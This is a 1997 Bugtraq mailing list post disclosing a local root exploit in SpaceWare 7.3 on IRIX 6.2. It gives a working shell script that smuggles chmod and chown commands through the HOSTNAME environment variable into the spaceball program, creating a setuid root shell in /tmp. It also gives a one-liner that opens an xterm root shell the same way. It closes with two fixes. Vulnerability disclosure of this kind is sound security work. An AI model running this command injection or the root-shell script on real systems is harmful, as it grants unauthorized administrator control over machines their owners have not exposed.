Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

SpaceWare 7.3 v1.0

From: spd () GTC1 CPS UNIZAR ES (J.A. Gutierrez)
Date: Wed, 20 Aug 1997 15:53:31 +0200

        Hello

        I guess anyone who's reading this already have noticed (if
        you are playing with a SpaceBall), anyway here it goes:


===========================================================================
#!/bin/sh

SWDIR=/usr/local/SpaceWare
cp /bin/sh /tmp/sh

echo 6 | HOSTNAME="/bin/chmod 4755 /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1
echo 6 | HOSTNAME="/bin/chown root /tmp/sh" \
$SWDIR/spaceball > /dev/null 2>&1

/tmp/sh
===========================================================================

        more information:

        IRIX 6.2
        spaceware 7.3 v1.0 (http://www.spacetec.com/)
        ftp://ftp.spacetec.com/put/spaceball2003and3003/drivers/app.irix.7_3.tar

        (Obviously, you can use HOSTNAME for any command you want
        to run as root, like
echo 6 | HOSTNAME="`which xterm` -e `which sh`" /usr/local/SpaceWare/spaceball
        )

        Fix:

        a) rm (since spaceball.sh does lots of nasty things, like
        running spaceball demos as root, probably this is the best
        solution)

        b) set HOSTNAME=/usr/bsd/hostname in the "Utilities" section of
        $SWDIR/spaceball.sh



--
    J.A. Gutierrez
    finger me for PGP
Previous By Date Next
Previous By Thread Next

Current thread: